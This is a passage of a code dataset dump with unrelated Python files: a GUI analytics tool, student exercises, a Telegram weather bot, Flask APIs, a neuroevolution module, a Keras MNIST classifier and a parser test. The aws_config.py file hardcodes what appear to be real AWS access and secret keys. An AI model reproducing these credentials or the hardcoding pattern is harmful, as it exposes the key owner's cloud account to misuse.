self.spreadsheetIdStackField.setStringValue_('Spreadsheet ID - Required -')\n else:\n self.spreadsheetIdStackField.setStringValue_('Spreadsheet ID')\n if self.sheetNameStack == '':\n if int(self.checkBoxSpreadsheetData.state()) == 1:\n self.sheetNameStackField.setStringValue_('Sheet name - Required -')\n else:\n self.sheetNameStackField.setStringValue_('Sheet name')\n if self.viewId == 0:\n self.viewIdTextField.setStringValue_('View ID - Required -')\n if self.metrics == '':\n self.metricsTextField.setStringValue_('Metric(s) - Required -')\n if self.dimensions == '':\n self.dimensionsTextField.setStringValue_('Dimension(s)')\n if self.sort == '':\n self.sortTextField.setStringValue_('Sort choices')\n if self.filters == '':\n self.filtersTextField.setStringValue_('Filters')\n if self.maxResults == 0:\n self.maxResultsTextField.setStringValue_('Number max of results')\n if self.spreadsheetId == '':\n self.spreadsheetIdTextField.setStringValue_('Spreadsheet ID')\n if self.sheetName == '':\n self.sheetNameTextField.setStringValue_('Sheet name')\n if self.range == '':\n self.rangeTextField.setStringValue_('Range (e.g. A1:B2)')\n\n def refreshArguments(self):\n self.viewId = self.temp[\"viewId\"]\n self.metrics = self.temp[\"metrics\"]\n self.dimensions = self.temp[\"dimensions\"]\n self.sort = self.temp[\"sort\"]\n self.filters = self.temp[\"filters\"]\n self.maxResults = str(self.temp[\"maxResults\"])\n\nif __name__ == '__main__':\n\n app = NSApplication.sharedApplication()\n\n # Initiate the contrller with a XIB\n viewController = UbermetricsController.alloc().initWithWindowNibName_(\"Ubermetrics\")\n\n # Show the window\n viewController.showWindow_(viewController)\n\n # Bring app to top\n NSApp.activateIgnoringOtherApps_(True)\n\n from PyObjCTools import AppHelper\n AppHelper.runEventLoop()\n","sub_path":"Ubermetrics.py","file_name":"Ubermetrics.py","file_ext":"py","file_size_in_byte":16982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"135962624","text":"# Let's write a program that gets an integer from the user and does not crash when a non-number is entered.\n# 'Copy the code below and modify/add the parts highlighted so that it works and prints the number at the end:\n\nfinished = False\nresult = 0\nwhile not finished:\n try:\n result = int(input(\"Please enter a number\"))\n finished = True\n except ValueError:\n print(\"Please enter a valid integer.\")\nprint(\"Valid result is:\", result)\n","sub_path":"CP1404_Practicals/week_02/exceptions_to_complete.py","file_name":"exceptions_to_complete.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461942029","text":"list = []\r\nprint('Programma del lanciatore')\r\nprint('Per interrompere il programma digitare nella distanza del lancio -1')\r\nwhile True:\r\n lanci = 0\r\n lanci = lanci + 1\r\n nome = input('Nome del lanciatore: ')\r\n lancio = int(input('Distanza del lancio: '))\r\n list.append(lancio)\r\n list.sort()\r\n if lancio == -1:\r\n print('Valore massimo: ', list[lanci])\r\n break\r\n lanci = lanci + 1","sub_path":"es28 02-12-2020.py","file_name":"es28 02-12-2020.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"267419142","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nfrom heapq import heapify, heappush, heappop\nclass Solution:\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n heap = []\n elementLeft = [True] * len(lists)\n for i, l in enumerate(lists):\n if l != None:\n heap.append((l.val, i))\n else:\n elementLeft[i] = False\n res = ListNode(0) # dummy node\n p = res\n heapify(heap)\n while any(elementLeft):\n val, listind = heappop(heap)\n p.next = lists[listind]\n p = p.next\n lists[listind] = lists[listind].next\n if lists[listind] == None:\n elementLeft[listind] = False\n else:\n heappush(heap, (lists[listind].val, listind))\n return res.next\n","sub_path":"Sort/MergeKLinkedLists.py","file_name":"MergeKLinkedLists.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"467439908","text":"from urllib.parse import unquote\n\nfrom flask import redirect, request, url_for\nfrom flask_api import FlaskAPI\n\nfrom . import models, utils\n\n\napp = FlaskAPI(\"Pomace\")\n\n\n@app.route(\"/\")\ndef index():\n return redirect(\"/sites?url=http://example.com\")\n\n\n@app.route(\"/sites\")\ndef pomace():\n if \"url\" not in request.args:\n return redirect(\"/\")\n\n utils.launch_browser(restore_previous_url=False)\n\n url = request.args.get(\"url\")\n page = models.Page.at(url) # type: ignore\n\n for action, value in request.args.items():\n if \"_\" in action:\n page, _updated = page.perform(action, value, _logger=app.logger)\n\n data = {\n \"id\": page.identity,\n \"url\": page.url,\n \"title\": page.title,\n \"html\": page.html.prettify(),\n \"text\": page.text,\n \"_next\": unquote(url_for(\".pomace\", url=page.url, _external=True)),\n \"_actions\": dir(page),\n }\n\n if not app.debug:\n utils.quit_browser()\n\n return data\n","sub_path":"pomace/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"276880243","text":"__author__ = 'venum'\n\n#This is the config file which is going to hold the values for being able to connect to the AWS Public cloud.\n\n\naws_region = \"us-west-2\"\naws_access_key_id = \"AKIAIEIFSFGXCVJQG23Q\"\naws_secret_access_key = \"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\"\n\naws_ami = 'ami-def297ee'\ninstance_type = 't1.micro'\n\ninstance_map = {}\n","sub_path":"aws_config.py","file_name":"aws_config.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"337118848","text":"def main():\n\n import os\n import sys\n sys.path.append(os.path.dirname(\n os.path.abspath(os.path.dirname(__file__))))\n\n import datetime\n from datetime import timedelta\n\n import time\n import telepot\n from telepot.loop import MessageLoop\n\n from src import hourly_for_telegram\n\n # import loggingmod\n import traceback\n\n def start_msg():\n return '''\n지역별 날씨를 예보합니다. 지역을 입력해주세요.\n마침표 하나만 입력해서 이전 지역을 다시 사용할 수 있습니다.\n\n/help 로 도움말을 볼 수 있습니다.\nBot command list:\n/start\n/help\n/command\n/about\n'''\n\n def help_msg():\n return '''\n지역별 날씨를 예보합니다. 지역을 입력해주세요.\n마침표 하나만 입력해서 이전 지역을 다시 사용할 수 있습니다.\n\nBot command list:\n/start\n/help\n/command\n/about\n'''\n\n def about_msg():\n return '''\nHourly Weather Bot\n\n@telnturtle || telnturtle@gmail.com\n'''\n\n def send_msg(bot, chat_id, msg):\n bot.sendMessage(chat_id, msg)\n # loggingmod.logger.info('chat_id: %s\\nGMT : %s\\nKST : %s\\npayload: %s\\n' % (\n # chat_id,\n # datetime.datetime.now().isoformat(' ')[:19],\n # (datetime.datetime.now() + timedelta(hours=9)).isoformat(' ')[:19],\n # msg))\n print('chat_id: %s\\nGMT : %s\\nKST : %s\\npayload: %s\\n' % (\n chat_id,\n datetime.datetime.now().isoformat(' ')[:19],\n (datetime.datetime.now() + timedelta(hours=9)).isoformat(' ')[:19],\n msg))\n\n def handle(msg_):\n content_type, chat_type, chat_id = telepot.glance(msg_)\n time_diff = time.time() - msg_['date']\n time_diff_limit = 60\n text = msg_['text']\n\n if content_type == 'text' and text.startswith('/'):\n if text == '/start':\n send_msg(bot, chat_id, start_msg())\n elif text == '/help':\n send_msg(bot, chat_id, help_msg())\n elif text == '/about':\n send_msg(bot, chat_id, about_msg())\n\n if content_type == 'text' and time_diff_limit > time_diff and not text.startswith('/'):\n\n # 'Sorry, an error occurred. Please try again later.'\n NO_RESULT_MSG = '일치하는 검색결과가 없습니다.'\n payload_list = []\n\n try:\n payload_list = hourly_for_telegram.make_payload(\n chat_id, text, aq=True, daily=True)\n # for weather.com only\n # payload_list[0] = (payload_list[0].replace('Rain', 'Rain☔')\n # .replace('Thunderstorm', 'Thunderstorm⛈')\n # .replace('Cloudy', 'Cloudy☁️')\n # .replace('Clouds', 'Clouds☁️')\n # .replace('Clear', 'Clear☀️')\n # .replace('Overcast', 'Overcast☁️'))\n except Exception as e:\n payload_list.insert(0, NO_RESULT_MSG)\n # loggingmod.logger.error(e, exc_info=True)\n traceback.print_exc()\n\n send_msg(bot, chat_id, payload_list[0])\n for msg_ in payload_list[1:] if payload_list[0] != NO_RESULT_MSG else []:\n send_msg(bot, chat_id, msg_)\n\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'rsc', '_keys', 'keys'), 'r') as f:\n TOKEN = f.readlines()[9][:-1]\n\n bot = telepot.Bot(TOKEN)\n _count = 5\n while 1:\n try:\n MessageLoop(bot, handle).run_as_thread(allowed_updates='message')\n # loggingmod.logger.info('Listening ...')\n print('Listening ...')\n while 1:\n time.sleep(5)\n except Exception as e:\n # loggingmod.logger.error(e, exc_info=True)\n traceback.print_exc()\n\n _count = _count - 1\n if _count < 1:\n break\n\n # Keep the program running.\n while 1:\n time.sleep(10)\n","sub_path":"src/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"366300756","text":"\r\nimport random\r\nimport math\r\nimport csv\r\nimport config\r\nimport numpy as np\r\nimport NeuralNetwork as NN\r\nfrom numba import jit, cuda\r\n\r\ngDnaLength = None\r\n\r\ndef expectedDnaLength(noInput, noHidden, noHiddenLayers, noOutput):\r\n global gDnaLength\r\n # If the DNA length has not been calculated yet. Calculate it. Otherwise look it up\r\n if gDnaLength == None:\r\n r1 = noInput + noInput # Input Layer\r\n r2 = noInput * noHidden + (noHidden) # First hidden layer\r\n r3 = (noHiddenLayers - 1) * noHidden * noHidden + ((noHiddenLayers - 1) * noHidden) # Rest of the hidden layers\r\n r4 = noOutput * noHidden + (noOutput) # Output Layer\r\n gDnaLength = r1 + r2 + r3 + r4\r\n return gDnaLength\r\n\r\nclass DNA:\r\n def __init__(self):\r\n self.mutationRate = 0.05\r\n self.crossoverSize = 50\r\n\r\n def extractFromDNA(self, DNA, noInput, noHidden, noHiddenLayers, noOutput):\r\n if config.ENABLE_CHECKS:\r\n requestedLength = expectedDnaLength(noInput, noHidden, noHiddenLayers, noOutput)\r\n assert requestedLength == len(DNA), \"DNA and requested lengths are not equal\"\r\n nxtIndex = 0\r\n\r\n # Input layer\r\n wInput = np.array(DNA[nxtIndex:nxtIndex+noInput])\r\n nxtIndex += noInput\r\n wBiasInput = np.array(DNA[nxtIndex:nxtIndex + noInput])\r\n nxtIndex += noInput\r\n\r\n wHidden = np.zeros(noInput*noHidden+noHidden*(noHiddenLayers-1)*noHidden)\r\n nxtHiddenIndex = 0\r\n wBiasHidden = np.zeros(noHiddenLayers*noHidden)\r\n\r\n # First hidden layer\r\n # wHidden.extend(DNA[nxtIndex:nxtIndex + noInput*noHidden])\r\n wHidden[nxtHiddenIndex:nxtHiddenIndex+noInput * noHidden] = (DNA[nxtIndex:nxtIndex + noInput * noHidden])\r\n nxtIndex += noInput*noHidden\r\n # wBiasHidden.extend(DNA[nxtIndex:nxtIndex + noHidden])\r\n wBiasHidden[nxtHiddenIndex:nxtHiddenIndex + noHidden] = (DNA[nxtIndex:nxtIndex + noHidden])\r\n nxtIndex += noHidden\r\n\r\n # Rest of the hidden layers\r\n for h in range(1,noHiddenLayers):\r\n # wHidden.extend(DNA[nxtIndex:nxtIndex + noHidden*noHidden])\r\n wHidden[nxtHiddenIndex:nxtHiddenIndex + noHidden * noHidden] = (DNA[nxtIndex:nxtIndex + noHidden * noHidden])\r\n nxtIndex += noHidden*noHidden\r\n\r\n # wBiasHidden.extend(DNA[nxtIndex:nxtIndex + noHidden])\r\n wBiasHidden[nxtHiddenIndex:nxtHiddenIndex + noHidden] = (DNA[nxtIndex:nxtIndex + noHidden])\r\n nxtIndex += noHidden\r\n\r\n wOutput = np.array(DNA[nxtIndex:nxtIndex + noHidden*noOutput])\r\n nxtIndex += noHidden*noOutput\r\n\r\n wBiasOutput = np.array(DNA[nxtIndex:nxtIndex + noOutput])\r\n nxtIndex += noOutput\r\n\r\n if config.ENABLE_CHECKS:\r\n buildLength = len(wInput) + len(wBiasInput) + len(wOutput) + len(wBiasOutput)+ len(wHidden) + len(wBiasHidden)\r\n assert buildLength == len(DNA), \"DNA and build lengths are not equal\"\r\n\r\n return wInput, wBiasInput, wHidden, wBiasHidden, wOutput, wBiasOutput\r\n\r\n\r\n def mutateDNA(self, DNA):\r\n return _mutate(DNA, self.mutationRate)\r\n # mutations = math.floor(len(DNA) * self.mutationRate)\r\n # for i in range(0, mutations):\r\n # randId = random.randrange(0,len(DNA))\r\n #\r\n # # Version 1 - Exchange with random weight\r\n # # DNA[randId] = random.random()\r\n #\r\n # # Version 2 - Modify with weight following gaussian distribution\r\n # DNA[randId] += random.gauss(0, 0.08)\r\n # return DNA\r\n\r\n def combineDNA(self, DNA1, DNA2):\r\n # newDNA = DNA1\r\n # for i in range(0, len(DNA1), 10):\r\n # if random.random() < 0.5:\r\n # newDNA[i:i+10] = DNA2[i:i+10]\r\n assert len(DNA1) == len(DNA2), \"The two DNA strings should be the same length\"\r\n newDNA = _crossover(DNA1,DNA2, self.crossoverSize)\r\n assert len(newDNA) == len(DNA1), \"New DNA constructed wrong\"\r\n return newDNA\r\n\r\n def getDNA(self, NN):\r\n wInput = NN.getInputWeights()\r\n wBiasInput = NN.getInputBiasWeights()\r\n wHidden = NN.getHiddenWeights()\r\n wBiasHidden = NN.getHiddenBiasWeights()\r\n wOutput = NN.getOutputWeights()\r\n wBiasOutput = NN.getOutputBiasWeights()\r\n return np.concatenate((wInput, wBiasInput, wHidden, wBiasHidden, wOutput, wBiasOutput))\r\n # return wInput + wBiasInput + wHidden + wBiasHidden + wOutput + wBiasOutput\r\n\r\n@jit(nopython=True)\r\ndef _mutate(DNA, mutationRate):\r\n mutations = math.floor(len(DNA) * mutationRate)\r\n for i in range(0, mutations):\r\n randId = random.randrange(0, len(DNA))\r\n DNA[randId] += random.gauss(0, 0.08)\r\n return DNA\r\n\r\n@jit(nopython=True)\r\ndef _crossover(DNA1, DNA2, crossoverSize):\r\n newDNA = DNA1\r\n for i in range(0, len(DNA1), crossoverSize):\r\n if random.random() < 0.5:\r\n newDNA[i:i + crossoverSize] = DNA2[i:i + crossoverSize]\r\n # assert len(newDNA) == len(DNA1), \"New DNA constructed wrong\"\r\n return newDNA\r\n\r\n\r\ndef toStr(DNA):\r\n dnaStr = \"\\n\".join([str(elem) for elem in DNA], )\r\n return dnaStr\r\n\r\ndef fromStr(dnaStr):\r\n reader = csv.reader(dnaStr, delimiter='\\n')\r\n DNA = []\r\n for row in reader:\r\n DNA.append(row[0][0])\r\n return DNA\r\n","sub_path":"Ludo64bitVersion/NeuralNetwork/DNA.py","file_name":"DNA.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"620075493","text":"import jwt\nfrom flask import g\nfrom models import Bucket, Item\nfrom app.authentication.models import User\nfrom api import app, db\n\nJWT_SECRET = 'secret'\nJWT_ALGORITHM = 'HS256'\n\n\ndef verify_token(token):\n user = jwt.decode(token, JWT_SECRET, JWT_ALGORITHM)\n g.user_id = user.get('user_id', '0')\n return user\n\n\ndef create_bucketlist(data, user_id):\n name = data.get('name', None)\n if not name:\n return \"No Name\"\n all_buckets = Bucket.query.filter_by(created_by=user_id).all()\n for bucket_name in all_buckets:\n if bucket_name.name == data['name']:\n return \"Bucket Exists\"\n\n user = User.query.filter_by(id=user_id).first()\n bucket = Bucket(name=name, created_by=user_id).save()\n return bucket\n\n\ndef retrieve_bucketlists(q):\n bucketlist = Bucket.query.filter(Bucket.name.contains(q))\n return bucketlist.filter_by(created_by=g.user_id)\n\n\ndef retrieve_single_bucketlist(id):\n bucket = Bucket.query.filter_by(created_by=g.user_id, id=id).first()\n return bucket\n\n\ndef edit_single_bucketlist(id, data):\n new_name = data.get('name', None)\n bucket = retrieve_single_bucketlist(id)\n bucket.name = new_name\n return bucket.update()\n\n\ndef delete_single_bucketlist(id):\n delete_bucket = Bucket.query.filter_by(id=id, created_by=g.user_id).first()\n if not delete_bucket:\n return \"Bucket not Found\"\n delete_bucket.delete()\n return {}, 204\n\n\ndef create_single_bucketlist_item(id, new_data):\n name = new_data.get('name', None)\n if not name:\n return \"No Name provided\"\n\n queryset = Bucket.query.filter_by(id=id, created_by=g.user_id).first()\n if not queryset:\n return \"Bucketlist Id not valid\"\n new_items = Item(name=name, bucket_id=queryset.id).save()\n return new_items.save(), 200\n\n\ndef edit_single_bucketlist_item(id, item_id, new_data):\n queryset = Item.query.filter_by(id=item_id, bucket_id=id).first()\n if not queryset:\n return \"Bucketlist Id not valid\"\n\n queryset.name = new_data.get('name', queryset.name)\n queryset.done = new_data.get('done', queryset.done)\n queryset = queryset.update()\n return queryset, 200\n\n\ndef delete_single_bucketlist_item(id, item_id):\n queryset = Item.query.filter_by(id=item_id, bucket_id=id).first()\n if not queryset:\n return \"Bucketlist Id not valid\"\n queryset.delete()\n return {}, 204\n","sub_path":"app/bucketlist/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"458170971","text":"##########################\r\n# 1. IMPORT LIBRARIES ##\r\n##########################\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nimport seaborn as sns\r\n\r\n# sklearn\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nimport itertools\r\n\r\n# keras\r\nfrom keras.utils.np_utils import to_categorical\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\r\nfrom keras.optimizers import RMSprop\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import ReduceLROnPlateau\r\n\r\n# set seed\r\nnp.random.seed(2)\r\n\r\n###########################\r\n## 2. DATA PREPARATION ##\r\n###########################\r\n# import data\r\ntrain = pd.read_csv(\"C:\\\\Users\\\\joann\\\\OneDrive\\\\Desktop\\\\My Files\\\\Data Science\\\\Digit Recognizer MNIST\\\\train.csv\")\r\ntest = pd.read_csv(\"C:\\\\Users\\\\joann\\\\OneDrive\\\\Desktop\\\\My Files\\\\Data Science\\\\Digit Recognizer MNIST\\\\test.csv\")\r\n\r\nY_train = train[\"label\"]\r\nX_train = train.drop(\"label\", axis=1)\r\n\r\n# quite balanced counts\r\nsns.countplot(Y_train)\r\nY_train.value_counts()\r\n\r\n# check for null and missing values\r\nX_train.isnull().any().describe()\r\ntest.isnull().any().describe()\r\n\r\n# normalize to reduce the effect of illumination's differences. Helps CNN converge faster too\r\nX_train = X_train/255.0\r\ntest = test/255.0\r\n\r\n# reshape image in 3 dimensions 28x28x1 (because 784 total pixel = 28*28)\r\nX_train = X_train.values.reshape(-1, 28, 28, 1)\r\ntest = test.values.reshape(-1, 28, 28, 1)\r\n\r\n# encode labels to one hot vectors (eg: 2 --> [0,0,1,0,0,0,0,0,0,0])\r\nY_train = to_categorical(Y_train, num_classes = 10)\r\n\r\n# check the shape\r\nX_train.shape #(42000, 28, 28, 1)\r\nY_train.shape #(42000, 10)\r\n\r\n###########################\r\n## 3. TRAIN TEST SPLIT ##\r\n###########################\r\nrandom_seed = 2\r\n# stratify to ensure some labels are not over represented in the validation set\r\nX_train, X_val, Y_train, Y_val = train_test_split(X_train, Y_train, test_size=0.1,\r\n stratify = Y_train,\r\n random_state = random_seed)\r\n# image example\r\nplt.imshow(X_train[1][:,:,0]) # 28 x 28\r\n\r\n#######################################\r\n## 4. CONVOLUTIONAL NEURAL NETWORK ##\r\n#######################################\r\n# (Conv2D --> RELU)*2 --> MaxPool2D --> (Dropout)*2 --> Flatten --> Dense --> Dropout --> Out\r\n# Conv2D: each filter transform a part of the image (kernel size) using the kernel filter.\r\n# MaxPool2D: downsampling filter. reduce computational cost and to some extent reduce overfitting\r\n# Combining convolutional and pooling layers, CNN are able to combine local features and \r\n# learn more global features of the image.\r\n# Dropout: regularization method, improved generalization and reduces overfitting\r\n# relu: add non-linearity to the network\r\n# flatten layer: convert the final feature maps into 1D vector\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(filters = 32, kernel_size = (5,5), padding = \"Same\",\r\n activation = \"relu\", input_shape = (28, 28, 1))) # channel is 1 because grayscale image\r\nmodel.add(Conv2D(filters = 32, kernel_size = (5,5), padding = \"Same\",\r\n activation = \"relu\"))\r\nmodel.add(MaxPool2D(pool_size=(2,2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Conv2D(filters = 64, kernel_size = (3,3), padding = \"Same\",\r\n activation = \"relu\"))\r\nmodel.add(MaxPool2D(pool_size=(2,2), strides=(2,2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(256, activation = \"relu\"))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(10, activation = \"softmax\")) # multiclass\r\n\r\n# set optimizer\r\noptimizer = RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\r\n\r\n# compile the model\r\nmodel.compile(optimizer = optimizer, loss = \"categorical_crossentropy\",\r\n metrics=[\"accuracy\"])\r\n\r\n# setting a learnig rate annealer \r\n# Reduce learning rate when a metric has stopped improving.\r\nlearning_rate_reduction = ReduceLROnPlateau(monitor = \"val_acc\",\r\n patience = 3,\r\n verbose = 1,\r\n factor = 0.5,\r\n min_lr = 0.00001)\r\n\r\nepochs = 30\r\nbatch_size = 86\r\n\r\n# data augmentation\r\n# to avoid overfitting problem, we expand artifically our dataset.\r\ndatagen = ImageDataGenerator(\r\n featurewise_center = False, # set input mean to 0\r\n samplewise_center = False, # set each sample mean to 0\r\n featurewise_std_normalization = False, # divide inputs by std of the dataset\r\n samplewise_std_normalization = False, # divide each input by its std\r\n zca_whitening = False, # a linear algebra operation that reduces the redundancy in the matrix of pixel images.\r\n rotation_range = 10, # randomly rotate images in the range (degrees 0 to 180)\r\n zoom_range = 0.1, # randomly zoom image\r\n width_shift_range = 0.1, # shifts randomly (fraction of total width)\r\n height_shift_range = 0.1, # shifts randomly (fraction of total height)\r\n horizontal_flip = False, # randomly flip images (could misclassify 6 and 9)\r\n vertical_flip = False) # randomly flip images (could misclassify 6 and 9))\r\n\r\ndatagen.fit(X_train)\r\n\r\n# fit the model\r\nhistory = model.fit_generator(datagen.flow(X_train, Y_train, batch_size=batch_size),\r\n epochs = epochs,\r\n validation_data = (X_val, Y_val),\r\n verbose = 2, \r\n steps_per_epoch = X_train.shape[0]//batch_size,\r\n callbacks = [learning_rate_reduction])\r\n\r\n#############################\r\n## 4. EVALUATE THE MODEL ##\r\n#############################\r\n# plot the loss and accuracy curves for training and validation\r\nfig, ax = plt.subplots(2,1)\r\nax[0].plot(history.history[\"loss\"], color=\"b\", label=\"Training loss\")\r\nax[0].plot(history.history[\"val_loss\"], color = \"r\", label=\"validation loss\", axes=ax[0])\r\nlegend = ax[0].legend(loc=\"best\", shadow=True)\r\n\r\nax[1].plot(history.history[\"acc\"], color=\"b\", label=\"Training accuracy\")\r\nax[1].plot(history.history[\"val_acc\"], color=\"r\", label=\"Validation accuracy\")\r\nlegend = ax[1].legend(loc=\"best\", shadow=True)\r\n\r\n# confusion matrix\r\ndef plot_confusion_matrix(cm, classes,\r\n normalize = False, # set to true if want normalized\r\n title = \"Confusion Matrix\",\r\n cmap = plt.cm.Blues):\r\n plt.figure(figsize=(8,8))\r\n plt.imshow(cm, interpolation=\"nearest\", cmap=cmap)\r\n plt.title(title)\r\n plt.colorbar()\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45)\r\n plt.yticks(tick_marks, classes)\r\n \r\n if normalize:\r\n cm = cm.astype(\"float\")/ cm.sum(axis=1)[:, np.newaxis]\r\n \r\n thresh = cm.max()/ 2.\r\n \r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, cm[i, j],\r\n horizontalalignment = \"center\",\r\n color = \"white\" if cm[i, j] > thresh else \"black\")\r\n \r\n plt.tight_layout()\r\n plt.ylabel(\"True label\")\r\n plt.xlabel(\"Predicted label\")\r\n \r\n# predict the values from the validation dataset\r\nY_pred = model.predict(X_val)\r\n# convert predictions classes to one hot vectors\r\n# get index of the highest probability \r\nY_pred_classes = np.argmax(Y_pred, axis = 1)\r\n# convert validation observations to one hot vectors\r\nY_true = np.argmax(Y_val, axis=1)\r\n\r\n# compute the confusion matrix\r\nconfusion_mtx = confusion_matrix(Y_true, Y_pred_classes)\r\n# plot the confusion matrix\r\nplot_confusion_matrix(confusion_mtx, classes = range(10))\r\n\r\n#############################\r\n## 5. ERROR INVESTIGATION ##\r\n#############################\r\nerrors = (Y_pred_classes - Y_true != 0)\r\nY_pred_classes_errors = Y_pred_classes[errors]\r\nY_pred_errors = Y_pred[errors]\r\nY_true_errors = Y_true[errors]\r\nX_val_errors = X_val[errors]\r\n\r\ndef display_errors(errors_index, img_errors, pred_errors, obs_errors):\r\n n = 0\r\n nrows = 2\r\n ncols = 3\r\n fig, ax = plt.subplots(nrows, ncols, sharex=True, sharey=True)\r\n for row in range(nrows):\r\n for col in range(ncols):\r\n error = errors_index[n]\r\n ax[row, col].imshow((img_errors[error]).reshape((28,28)))\r\n ax[row, col].set_title(\"Predicted label: {}\\nTrue label :{}\".format(pred_errors[error],\r\n obs_errors[error]))\r\n n += 1\r\n \r\n# probabilities of the wrong predicted numbers\r\nY_pred_errors_prob = np.max(Y_pred_errors, axis=1)\r\n\r\n# predicted probabilities of the true values in the error set\r\ntrue_prob_errors = np.diagonal(np.take(Y_pred_errors, Y_true_errors, axis=1))\r\n\r\n# difference between the probabilities of the predicted label and the true label\r\ndelta_pred_true_errors = Y_pred_errors_prob - true_prob_errors\r\n\r\n# sorted list of the delta prob errors\r\nsorted_delta_errors = np.argsort(delta_pred_true_errors)\r\n\r\n# top 6 errors\r\nmost_important_errors = sorted_delta_errors[-6:]\r\n\r\n# show the top 6 errors\r\ndisplay_errors(most_important_errors, X_val_errors, Y_pred_classes_errors, Y_true_errors)\r\n\r\n#####################\r\n## 6. PREDICTION ##\r\n#####################\r\nresults = model.predict(test)\r\nresults = np.argmax(results, axis=1)\r\nresults = pd.Series(results, name=\"Label\")\r\n\r\n#####################\r\n## 7. SUBMISSION ##\r\n#####################\r\nsubmission = pd.concat([pd.Series(range(1, 28001), name = \"ImageId\"), results],\r\n axis=1)\r\n\r\nsubmission.to_csv(\"C:\\\\Users\\\\joann\\\\OneDrive\\\\Desktop\\\\My Files\\\\Data Science\\\\Digit Recognizer MNIST\\\\submission.csv\", index=False)","sub_path":"digit_recognizer.py","file_name":"digit_recognizer.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"215186955","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r\"^$\", views.friends, name=\"invitations\"),\n url(r\"^contacts/$\", views.contacts, name=\"invitations_contacts\"),\n url(r\"^accept/(\\w+)/$\", views.accept_join, name=\"friends_accept_join\"),\n url(r\"^invite/$\", views.invite, name=\"invite_to_join\"),\n]\n","sub_path":"apps/friends_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"194742503","text":"# Python\r\nimport re\r\nimport unittest\r\nfrom unittest.mock import Mock\r\n\r\n# ATS\r\nfrom pyats.topology import Device\r\n\r\n# Metaparser\r\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\r\n\r\n# Parser\r\nfrom genie.libs.parser.linux.ps import Ps\r\n \r\n\r\n# ===============\r\n# Unit tests for:\r\n# 'ps -ef'\r\n# ===============\r\nclass TestPs(unittest.TestCase):\r\n device = Device(name='aDevice')\r\n empty_output = {'execute.return_value': ''}\r\n \r\n golden_parsed_output = {\r\n 'pid': {\r\n '1': {\r\n 'uid': 'root',\r\n 'ppid': '0',\r\n 'c': '0',\r\n 'stime': '2019',\r\n 'tty': '?',\r\n 'time': '00:03:36',\r\n 'cmd': '/sbin/init'\r\n },\r\n '2': {\r\n 'uid': 'root',\r\n 'ppid': '0',\r\n 'c': '0',\r\n 'stime': '2019',\r\n 'tty': '?',\r\n 'time': '00:00:07',\r\n 'cmd': '[kthreadd]'\r\n },\r\n '1774': {\r\n 'uid': 'root',\r\n 'ppid': '1730',\r\n 'c': '0',\r\n 'stime': '2019',\r\n 'tty': '?',\r\n 'time': '00:00:00',\r\n 'cmd': 'hald-addon-input: Listening on /dev/input/event2 /dev/input/event0'\r\n },\r\n '1781': {\r\n 'uid': '68',\r\n 'ppid': '1730',\r\n 'c': '0',\r\n 'stime': '2019',\r\n 'tty': '?',\r\n 'time': '00:00:00',\r\n 'cmd': 'hald-addon-acpi: listening on acpid socket /var/run/acpid.socket'\r\n }\r\n }\r\n }\r\n\r\n golden_output = {'execute.return_value': '''\r\n UID PID PPID C STIME TTY TIME CMD \r\n root 1 0 0 2019 ? 00:03:36 /sbin/init\r\n root 2 0 0 2019 ? 00:00:07 [kthreadd] \r\n root 1774 1730 0 2019 ? 00:00:00 hald-addon-input: Listening on /dev/input/event2 /dev/input/event0 \r\n 68 1781 1730 0 2019 ? 00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket\r\n '''}\r\n\r\n def test_ps_golden(self):\r\n self.maxDiff = None\r\n self.device = Mock(**self.golden_output)\r\n obj = Ps(device=self.device)\r\n parsed_output = 